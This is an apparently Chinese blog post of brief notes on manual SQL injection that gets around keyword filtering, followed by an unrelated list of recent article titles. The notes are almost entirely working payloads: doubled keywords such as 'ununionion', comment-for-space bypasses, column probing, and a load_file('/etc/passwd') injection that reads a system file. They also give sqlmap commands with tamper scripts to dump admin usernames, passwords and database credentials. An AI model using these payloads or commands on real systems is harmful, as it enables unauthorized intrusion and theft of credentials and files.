SQL手工注入绕过过滤
2024-10-09 06:47:17
1、考虑闭合:单引号 --> %27 空格-->%20 井号--> %23 ; 构造闭合函数 %27teacher%23
2、判断过滤内容:union --> uniunionon ; 联合查询过滤,再un后再加union ;
3、判断列数,使用Union 语法,union 后边语句要与前边已经执行的语句列数相同。
%27/**/ununionion/**/select/**/1/**/%23 判断是否为1列,返回值为错误,空
%27/**/ununionion/**/select/**/1,2/**/%23 判断是否为2列 返回值为正常,则union之前的查询语句为两列
4、id=-1 让前边的select 语句执行输出无内容,再往后执行union语句,打印相关文件内容。
使用load_file(‘/etc/passwd’)
%27/**/ununionion/**/select/**/1,load_file("/etc/passwd")/**/%23
5、或者使用sqlmap -u "url" --tamper "space2comment.py, space2hash.py"
6、SQLMAP用法:
(1)判断库:当前库在第一行 当前是article
sqlmap.py -u "url" --dbs
(2)判断表名:
sqlmap.py -u "url" --dbs -D article (表名) --tables
(3)判断列名:
sqlmap.py -u "url" --dbs -D article (表名) -T admin --columns
(4)判断值:
sqlmap.py -u "url" --dbs -D article (表名) -T admin -C username, password --dump
(5)判断数据连接用户的密码:sa
sqlmap.py -u "url" --passwords 找到连接密码 用 nvicat连接。
最新文章
- java基本算法之冒泡排序
- 右下角浮窗&动画效果
- 【JAVA网络流之URL】
- iOS开发UI篇—多控制器和导航控制器简单介绍
- 关于网站高性能中磁盘cpu以及内存对网站性能的影响
- 用Objective-C的Category特性添加类的属性
- Date.prototype.format,js下的时间格式处理函数
- xtraReprot 动态绑定数据 数据列动态
- SSH项目过一段时间之后再访问会报一次Could not open Hibernate session for transaction 异常,Caused by: com.mysql.jdbc.CommunicationsException: Communications link failure due to underlyi,再重新方法即可访问成功(通常出现在过了一晚之后再去访问系统)
- ireport导出中英文pdf
- H5混合开发二维码扫描以及调用本地摄像头
- Ubuntu16.04系统下 解决“无法获得锁 /var/lib/dpkg/lock -open (11:资源暂时不可用)、无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它?”的方法
- vscode断点调试简单的服务端文件
- fatal: could not read Username for 'https://git.dev.tencent.com' 解决方法
- dubbo的具体使用
- 使用msf对tomcat测试
- 转:HashMap实现原理分析(面试问题:两个hashcode相同 的对象怎么存入hashmap的)
- 模拟实现strncpy,strncat,strncmp
- spark streaming的容错:防止数据丢失
- Linux运维常用150个命令